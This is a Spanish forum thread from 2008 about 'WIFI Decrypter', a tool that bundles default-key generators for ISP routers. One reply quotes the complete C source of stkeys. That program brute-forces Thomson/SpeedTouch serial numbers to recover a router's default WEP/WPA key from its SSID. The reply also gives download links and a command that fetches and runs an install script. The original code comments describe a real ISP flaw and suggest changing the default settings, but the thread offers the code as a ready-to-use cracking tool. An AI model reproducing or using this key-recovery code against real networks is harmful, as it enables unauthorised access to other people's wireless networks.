Bienvenido(a), Visitante. Por favor, ingresa o regístrate.
¿Perdiste tu email de activación?
24-04-2014, 19:14 (Jueves)
Inicio Ayuda Reglas Buscar Ingresar Registrarse
Noticias:
Guia completa como ser un verdadero hacker wireless

+  Seguridad Wireless - Wifi
|-+  Desarrollo de scripts y aplicaciones
| |-+  Aplicaciones y diccionarios windows (Moderador: NirozMe|on)
| | |-+  Presentacion de WIFI Decrypter
0 Usuarios y 2 Visitantes están viendo este tema. « anterior próximo »
Páginas: [1] 2 3 Ir Abajo Imprimir
Autor Tema: Presentacion de WIFI Decrypter  (Leído 227863 veces)
aguml
**
Desconectado Desconectado

Mensajes: 42


Ver Perfil
« : 22-12-2008, 02:43 (Lunes) »

Hola amigos, en breve os presentare a mi criatura  Grin Lo he llamado WIFI Decrypter por ponerle un nombre pero no es mas que la union de los codigos del jazztel decrypter, wlan decrypter, decsagem y speedtouch. Todas esas opciones estan 100% funcionales en mi aplicacion. A ver que os parece.
Antes de nada decir que esta en C++builder y que va perfectamente en windows y esta probada en wifislax, ubuntu y backtrack y en todas va perfectamente usando el wine.

Edito:

Programa y manual: http://www.seguridadwireless.net/archivos/WIFI_Decrypter.rar

Manual solo: http://www.seguridadwireless.net/archivos/ayuda.pdf

Fuentes para C++Builder 6: http://rapidshare.com/files/177618740/Fuentes_WIFI_Decrypter.rar.html






« Última modificación: 28-12-2008, 23:31 (Domingo) por aguml » En línea
Hwagm
Administrador
*
Desconectado Desconectado

Mensajes: 15623



Ver Perfil WWW
« Respuesta #1 : 22-12-2008, 02:49 (Lunes) »

esperamos ansiosos  Wink

y lo metere en el nuevo feed de seguridadwireless que estoy probando

« Última modificación: 22-12-2008, 03:40 (Lunes) por Hwagm » En línea

*dudux
Visitante
« Respuesta #2 : 22-12-2008, 09:47 (Lunes) »

Hola amigos, en breve os presentare a mi criatura  Grin Lo he llamado WIFI Decrypter por ponerle un nombre pero no es mas que la union de los codigos del jazztel decrypter, wlan decrypter, y decsagem. Todas esas opciones estan 100% funcionales en mi aplicacion y solo me gustaria de momento añadir un solo tipo mas y es el Speedtouch y con eso os la presentare a todos a ver que os parece.
Antes de nada decir que esta en C++builder y que va perfectamente en windows y esta probada en wifislax y ubuntu y backtrack y en todas va perfectamente.

Es para windows y esta probado en linux?
En línea
βerni69
... Aprendiendo ...
*******
Desconectado Desconectado

Mensajes: 7235


Enllaçats per la llengua


Ver Perfil WWW
« Respuesta #3 : 22-12-2008, 09:55 (Lunes) »

yo creo que lo ha compilado paraa los ambos... aunque asi como lo dice no l odeja muy claro
En línea

Errar es humano, pero para liar las cosas de verdad se necesita un ordenador

Triste que ..  "Una mentira mil veces repetida....se transforme en verdad"


www.bitsdelocos.es/
Tutorial Swifi keygen + Airwin 2.0 auditorias en windows Comprawifi amenaza a Bitsdelocos
*dudux
Visitante
« Respuesta #4 : 22-12-2008, 11:47 (Lunes) »

yo creo que lo ha compilado paraa los ambos... aunque asi como lo dice no l odeja muy claro

esta claro.............

no te olvides de dlinkdecrypter
En línea
ChimoC
Memoria, dignidad y justicia
Colaborador
*
Desconectado Desconectado

Mensajes: 6226



Ver Perfil
« Respuesta #5 : 22-12-2008, 14:12 (Lunes) »

Buenas:

Creo que el Speedtouch vale tambien para las THOMSONXXXX que sacan nuevas

Un saludo

ChimoC

P.D.: Yo no lo puedo asegurar puesto que no he auditado ninguna THOMSONXXXX ... aunque me han comentado que sí funciona
En línea

Hemos puesto bozal al buscador del foro, ya no muerde, asi que USALO
aguml
**
Desconectado Desconectado

Mensajes: 42


Ver Perfil
« Respuesta #6 : 22-12-2008, 14:19 (Lunes) »

es para windows pero lo probe en wifislax y funciona porque se ve que wifislax trae de casa el wine y ademas solo uso funciones muy muy basicas de windows como MessageBoxA, o SellExecute. Yo simplemente lo meto en cualquier sitio con permiso de ejecucion y le doy a ejecutar con wine y arranca. Los diccionarios los crea en el directorio root.
Digamos que la vista de los botones no es igual que en windows porque no coge el manifiesto de windows que esta en los recursos del programa pero funcionar funciona de maravilla. En cuanto le meta el SpeedTouch lo pondre junto con los fuentes. Wink

PD: la d-link tambien esta.

¿Nadie puede pasarme los fuentes o el algoritmo del speedtouch ese? ¿cuantas claves como maximo muestra el programa ese del speedtouch?
« Última modificación: 22-12-2008, 14:45 (Lunes) por aguml » En línea
*dudux
Visitante
« Respuesta #7 : 22-12-2008, 15:47 (Lunes) »

Buenas:

Creo que el Speedtouch vale tambien para las THOMSONXXXX que sacan nuevas

Un saludo

ChimoC

P.D.: Yo no lo puedo asegurar puesto que no he auditado ninguna THOMSONXXXX ... aunque me han comentado que sí funciona

si que funciona
En línea
aguml
**
Desconectado Desconectado

Mensajes: 42


Ver Perfil
« Respuesta #8 : 22-12-2008, 16:43 (Lunes) »

lo que si que lei es que con solo 4 caracteres del ESSID nos saldran unas 80 claves potenciales y no 1 o 2 como cuando son 6 caracteres.
En línea
*dudux
Visitante
« Respuesta #9 : 22-12-2008, 19:35 (Lunes) »

es para windows pero lo probe en wifislax y funciona porque se ve que wifislax trae de casa el wine y ademas solo uso funciones muy muy basicas de windows como MessageBoxA, o SellExecute. Yo simplemente lo meto en cualquier sitio con permiso de ejecucion y le doy a ejecutar con wine y arranca. Los diccionarios los crea en el directorio root.
Digamos que la vista de los botones no es igual que en windows porque no coge el manifiesto de windows que esta en los recursos del programa pero funcionar funciona de maravilla. En cuanto le meta el SpeedTouch lo pondre junto con los fuentes. Wink

PD: la d-link tambien esta.

¿Nadie puede pasarme los fuentes o el algoritmo del speedtouch ese? ¿cuantas claves como maximo muestra el programa ese del speedtouch?



Citar
/*

   **************************************************************************

   *                                                                        *

   * Default WEP/WPA key generation for Thomson series wireless routers     *

   *                                                                        *

   *   Date: March 15th 2008                                                *

   *   Author: Kevin Devine <wyse101@gmail.com>                             *

   *                                                                        *

   **************************************************************************



   AFAIK, this is a well known problem by some ISP.

   It is likely to affect any owner of a Thomson wireless router with

   default settings installed.



   **************************************************************************



   The format of a serial number:



   CP YY WW PP XXX (CC)



   And from what i can tell of the following serial number taken from

   router i received.



   CP 06 15 JT 109 (53)



   YY is the year produced.      ( 2006  ) ?

   WW is the week of year.       ( some week of April ) ?

   PP is the production code.    ( JT ) factory code?

   CC is the configuration code. ( 53 ) seems to be 00 - ZZ (0-9/A-Z)



   I can only guess that the XXX values represent the unit number



   **************************************************************************



   The key generation is simple enough.



   Take as example: "CP0615JT109 (53)"



   Remove the CC and PP values



     "CP0615109"



   Convert the XXX values to hexadecimal.



     "CP0615313039"



   Process with SHA-1



     742da831d2b657fa53d347301ec610e1ebf8a3d0



   The last 3 bytes are converted to 6 byte string, and appended to

   the word "SpeedTouch" which becomes the default SSID.



     "SpeedTouchF8A3D0"



   The first 5 bytes are converted to a 10 byte string which

   becomes the default WEP/WPA key.



    "742DA831D2"



   Thats it..

   **************************************************************************



   I was unable to determine if its possible to obtain the base serial

   number from the MAC, but it can't be ruled out.



   The method of recovery here using brute force attack of the

   default SSID octets, is pretty lame..but is enough for now.



   Theoretically, with 3 octets, no more than ~2 attempts are required

   before successfully accessing the router.



   When only 2 octets are provided, (example:BT Voyager/Home Hub routers)

   more potential keys are generated, with further required attempts -

   an average of 80.



   This still improves odds of an attacker gaining access

   to WPA protected routers - more so if an attacker can capture a WPA

   handshake and crack with Aircrack,Cain & Abel or offline with coWPAtty.

   

   Obviously the problem is with implementation of key/ssid generation

   and not WPA itself.

   **************************************************************************

   

   The only solution _right now_ is to have customers either turn off wireless

   (if its not being used), or change the default settings.



   To compile, use:



     gcc -fomit-frame-pointer -O3 -funroll-all-loops stkeys.c sha1.c -ostkeys

   

   Use OpenSSL SHA-1 for this to run faster..

   

   Example usage for ST585v6 router:

     

      SSID: "SpeedTouchF8A3D0":



   c:\stkeys -v -iF8A3D0



   Serial Number: CP0615**109 - potential key = 742DA831D2  <- this is the right one

   Serial Number: CP0621**AHJ - potential key = 00651124D9



   Found 2 potential keys.



*/



#include <stdio.h>

#include <getopt.h>



#include "sha1.h"



#define SHA1Init SHA1Reset

#define SHA1Update SHA1Input

#define SHA1Final SHA1Result

#define SHA1_CTX SHA1Context



typedef unsigned char u8;

typedef unsigned int u32;



const u8 charTable[]="0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ";

const u8 hexTable[]="0123456789ABCDEF";

      u8 serial[13]={'C','P','0',0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00};



#define SERIAL_LENGTH 12

#define MAX_SSID_OCTETS 6

#define DEFAULT_KEY_SIZE 5



#define hexmsb(x)(hexTable[((x & 0xf0) >> 4)])

#define hexlsb(x)(hexTable[ (x & 0x0f)])



void usage(char **argv) {



    fprintf(stdout,"\n\tUso: %s [ -i <ssid octets> ] [ -o <output file> ]\n"

                   "\n\t -i : Los octetos hexadecimales del SSID del router Thomson"

                   "\n\t -o : Especificar el fichero de salida para las posibles claves"

                   "\n\t -v : Imprime en pantalla las posibles claves encontradas\n\n",*argv);

                 

    exit(0);

}



/*

 * convert hexadecimal ssid string to binary

 * return 0 on error or binary length of string

 *

 */

u32 str2ssid(u8 ssid[],u8 *str) {



    u8 *p,*q = ssid;

    u32 len = strlen(str);



    if( (len % 2) || (len > MAX_SSID_OCTETS) )

      return(0);



    for(p = str;(*p = toupper(*p)) && (strchr(hexTable,*p)) != 0;) {



      if(--len % 2) {

        *q = ((u8*)strchr(hexTable,*p++) - hexTable);

        *q <<= 4;

      }else {

        *q++ |= ((u8*)strchr(hexTable,*p++) - hexTable);

      }

    }

    return( (len) ? 0 : (p - str) / 2);

}



/*

 * print 5 bytes to output file

 *

 */

void dump_key(FILE *out, u8 *key) {

 

    u32 i;

    u8 *p = key;



    for(i = 0;i < DEFAULT_KEY_SIZE;i++)

      fprintf(out,"%.2X",*p++);



    fprintf(out,"\n");

}



int main(int argc, char **argv) {



    u8 sha1_digest[40]={0};

    u8 ssid[8]={0},buf[8]={0},year,week,x1,x2,x3;

    u32 keys = 0,ssidLen = 0,verbose = 0, opt = 0;

    u8 *p,*q,*strId = NULL;

    FILE *ofile = NULL;



    SHA1_CTX sha1_ctx;



    if(argc > 1) {

      while( (opt = getopt(argc, argv,"vo:i:")) != -1) {



        switch(opt) {



          case 'i' :

            strId = optarg;

            break;



          case 'o' :

            if((ofile = fopen(optarg,"wb")) == NULL) {

              fprintf(stderr,"\nNo puedo abrir %s para la salida.\n",optarg);

              return(0);

            }

            break;



          case 'v' :

            verbose++;

            break;



          default:

            usage(argv);

        }

      }



      if(!strId) usage(argv);



      if(!(ssidLen = str2ssid(ssid,strId))) usage(argv);



      fprintf(stdout,"\nGenerando claves... por favor espera\n\n");



        // generate values only for 2005/2007..change if you want.



        for(year = 5;year <= 7;year++) {



          serial[3] = year | '0';



          // 52 weeks of the year



          for(week = 1;week <= 52;week++) {

           

            serial[4] = (week / 10) + '0';

            serial[5] = (week % 10) + '0';



            for(x1 = 0;x1 < 36;x1++) {



              serial[6] = hexmsb(charTable[x1]);

              serial[7] = hexlsb(charTable[x1]);



              for(x2 = 0;x2 < 36;x2++) {



                serial[8] = hexmsb(charTable[x2]);

                serial[9] = hexlsb(charTable[x2]);



                for(x3 = 0;x3 < 36;x3++) {



                  serial[10] = hexmsb(charTable[x3]);

                  serial[11] = hexlsb(charTable[x3]);



                  // hash serial number with sha-1



                  SHA1Init(&sha1_ctx);

                  SHA1Update(&sha1_ctx,serial,SERIAL_LENGTH);

                  SHA1Final(&sha1_ctx,sha1_digest);



                  // compare SSID octets with last number of bytes supplied



                  if(memcmp(&sha1_digest[(20-ssidLen)],ssid,ssidLen) == 0) {



                    keys++;



                    if(verbose) {



                      memcpy(buf,serial,6);



                      fprintf(stdout,

                              "Número de Serie: %s**%C%C%C - posible clave = ",

                              buf,charTable[x1],charTable[x2],charTable[x3]);



                      dump_key(stdout,sha1_digest);

                    }

                    if(ofile) {

                      dump_key(ofile,sha1_digest);

                    }

                  }

                }

              }

            }

          }

        }

      fprintf(stdout,"\nResultado: %d posibles claves.\n\n",keys);



      if(ofile) fclose(ofile);

    }

    else {

        usage(argv);

    }

    return(0);

}




- Descarga del código fuente en español (compilable en linux/windows):
http://download.wifislax.com/stkeys_ES_src.zip
m5d: 6472d51a88010754756154d93d7fb2be


- Linux (compilado+instalador+lanzador). Desde cónsola teclead:
Citar
wget http://www.wifiway.org/stkeys/install.sh.gz
gzip -d install.sh.gz
chmod +x install.sh
./install.sh

- Windows (compilado):
http://download.wifislax.com/SpeedTouchKeys-v0.1.zip
MD5: 2b5ea7d4539ea5b02fc8ea569e5566f6
En línea
*dudux
Visitante
« Respuesta #10 : 22-12-2008, 20:29 (Lunes) »

Citar
*********************************************************************************

 *                                                                               *

 * Generador de claves WEP/WPA preconfiguradas para Routers inalámbricos Thomson *

 *                                                                               *

 *    Fecha: 15 de Marzo de 2008                                                 *

 *    Autor: Kevin Devine <wyse101@gmail.com>                                    *

 *           --Traducción libre por Hrodgar--                                    *

 *                                                                               *

 *********************************************************************************



 Esto es un problema conocido para varios ISPs.

 Probablemente afecta a muchos de los usuarios de routers Thomson inalámbricos de

 varios modelos, que mantienen los parámetros de configuración por defecto.



 *********************************************************************************



 Para compilar el código, usar gcc:



   gcc -fomit-frame-pointer -O3 -funroll-all-loops stkeys.c sha1.c -ostkeys

   

 Destacar que en el código se ha utilizado la implementación del algoritmo OpenSSL

 SHA-1, que es por lo que realiza el proceso bastante rápido.

   

 *********************************************************************************



 Opciones:



      Uso: ./stkeys [ -i <ssid octets> ] [ -o <output file> ]



       -i : Los octetos hexadecimales del SSID del router Thomson

       -o : Especificar el fichero de salida para las posibles claves

       -v : Imprime en pantalla las posibles claves encontradas

   

 *********************************************************************************

   

 Ejemplo de uso en un router Thomson modelo ST585v6 con ESSID "SpeedTouchF8A3D0":



 c:\stkeys -v -iF8A3D0



 Número de serie: CP0615**109 - posible clave = 742DA831D2

 Número de serie: CP0621**AHJ - posible clave = 00651124D9



 Resultado: 2 posibles claves.

 

 (En el ejemplo, la correcta es la obtenida en la primera opción)



 *********************************************************************************



 Mas información (en Ingles):



     http://h1.ripway.com/kevindevine/stech/index.html



 Foros de discusión del tema en español:



     http://foro.seguridadwireless.net/index.php/board,7.0.html



     http://foro.elhacker.net/index.php?board=48.0

 
En línea
*dudux
Visitante
« Respuesta #11 : 22-12-2008, 21:29 (Lunes) »

una pregunta............. Grin


estas haciendo lo mismo o similar que izo maxmad332 ?¿
http://tubalmartin.googlecode.com/svn/trunk/html/EWFInet.html#

En línea
aguml
**
Desconectado Desconectado

Mensajes: 42


Ver Perfil
« Respuesta #12 : 23-12-2008, 02:11 (Martes) »

gracias, intentare tenerlo para esta semana  Grin

PD: mas o menos es similar al de Max pero hay cambios que creo que son importantes. Cuando salga ya me contareis. Azn
« Última modificación: 23-12-2008, 02:14 (Martes) por aguml » En línea
sch3m4
**
Desconectado Desconectado

Mensajes: 15



Ver Perfil WWW
« Respuesta #13 : 23-12-2008, 03:06 (Martes) »

solo como comentario constructivo, podrías hacerlo siguiendo los estándares, usar librerías portables para la parte gráfica, y así lo tendrías multiplataforma, pudiendo compilarlo con optimizaciones para cada sistema y sin necesidad de usar wine.
En línea
aguml
**
Desconectado Desconectado

Mensajes: 42


Ver Perfil
« Respuesta #14 : 23-12-2008, 03:32 (Martes) »

solo como comentario constructivo, podrías hacerlo siguiendo los estándares, usar librerías portables para la parte gráfica, y así lo tendrías multiplataforma, pudiendo compilarlo con optimizaciones para cada sistema y sin necesidad de usar wine.

no se hacerlo de esa forma pero no te preocupes que pondre el fuente y si alguien sabe pues tendra poco que cambiar digo yo, ya que casi todo lo que uso son propias del c++builder y muy pocas apis de windows.

Ya practicamente esta a falta de esos dos archivos y depurar un par de detalles.
« Última modificación: 23-12-2008, 04:09 (Martes) por aguml » En línea
Vilar
**
Desconectado Desconectado

Mensajes: 12


Ver Perfil
« Respuesta #15 : 23-12-2008, 13:50 (Martes) »

Usa java; Funcionaria en Windows, Mac OS X, y Linux.

Tambien puedes incluir los archivos ejecutables de cada sistema (.exe, .sh, etc.).

Solo una idea.
En línea
sch3m4
**
Desconectado Desconectado

Mensajes: 15



Ver Perfil WWW
« Respuesta #16 : 23-12-2008, 16:26 (Martes) »

precisamente que lo que usas es todo practicamente de c++ builder, no es portable, ya que aunque tú estes usando pocas apis de windows, c++ builder usa muchisimas de ellas. Puedes usar wxWidget o GTK+ para la parte gráfica que son librerías portables, y hacer el código de tu programa multiplataforma, mucho más portable. Si mal no recuerdo, con wxDev-Cpp, puedes hacer "lo mismo" que con c++ builder usando las librerías portables.
En línea
*dudux
Visitante
« Respuesta #17 : 24-12-2008, 00:37 (Mircoles) »

precisamente que lo que usas es todo practicamente de c++ builder, no es portable, ya que aunque tú estes usando pocas apis de windows, c++ builder usa muchisimas de ellas. Puedes usar wxWidget o GTK+ para la parte gráfica que son librerías portables, y hacer el código de tu programa multiplataforma, mucho más portable. Si mal no recuerdo, con wxDev-Cpp, puedes hacer "lo mismo" que con c++ builder usando las librerías portables.

 Angry Angry Angry Angry

estoy totalmente de acuerdo......ade+ qe los algoritmos estan echos y solo es  por aprender me curraria algo multiplataforma
hoy en dia quiere un .exe ?¿

aunque cada uno es libre..........y yo prefiero sw libre
En línea
aguml
**
Desconectado Desconectado

Mensajes: 42


Ver Perfil
« Respuesta #18 : 24-12-2008, 05:01 (Mircoles) »

bueno, tengo un problema y es que en el fuente este usa un archivo llamado getopt.h el cual no tengo y sin el creo que no podre seguir puesto que hace esto en el codigo:

    if(argc > 1) {
      while( (opt = getopt(argc, argv,"vo:i:")) != -1) {
        switch(opt) {
          case 'i' :
            strId = optarg;
            break;

no se que es opt, ni getopt, ni optarg y sobre todo optarg necesito saberlo para seguir, ya que strId es el segundo parametro de entrada para esta funcion:

unsigned int str2ssid(unsigned char ssid[],unsigned char *str)

sin ese parametro no puedo seguir porque no se que contiene y no se que deberia poner en su lugar. A ver si el autor me ilumina y me ayuda un poco que ando perdido con eso.

PD: ya dije que no sabria hacerlo portable pero tambien dije que con wine va perfecto asi que no hay ningun problema, es mas, yo instale el wifislax y no añadi nada y trae el wine con lo cual no hay problema ninguno en usarlo. De todos modos ya dije que cuando lo tenga mandare tambien los fuentes para que el que sepa le meta mano y lo haga portable para otras plataformas. Wink
« Última modificación: 24-12-2008, 05:32 (Mircoles) por aguml » En línea
*dudux
Visitante
« Respuesta #19 : 24-12-2008, 12:36 (Mircoles) »

es una libreria de c como bien se ve
get en ingles es conseguier y opt es de option y va en un mullticas e como es un swich
http://bulma.net/body.phtml?nIdNoticia=1290
Citar
D: ya dije que no sabria hacerlo portable pero tambien dije que con wine va perfecto asi que no hay ningun problema, es mas, yo instale el wifislax y no añadi nada y trae el wine con lo cual no hay problema ninguno en usarlo. De todos modos ya dije que

cuando lo tenga mandare tambien los fuentes para que el
lo hasprobado? 
En línea
Páginas: [1] 2 3 Ir Arriba Imprimir 
« anterior próximo »
Ir a:  


Ingresar con nombre de usuario, contraseña y duración de la sesión

Powered by SMF 1.1.19 | SMF © 2006-2008, Simple Machines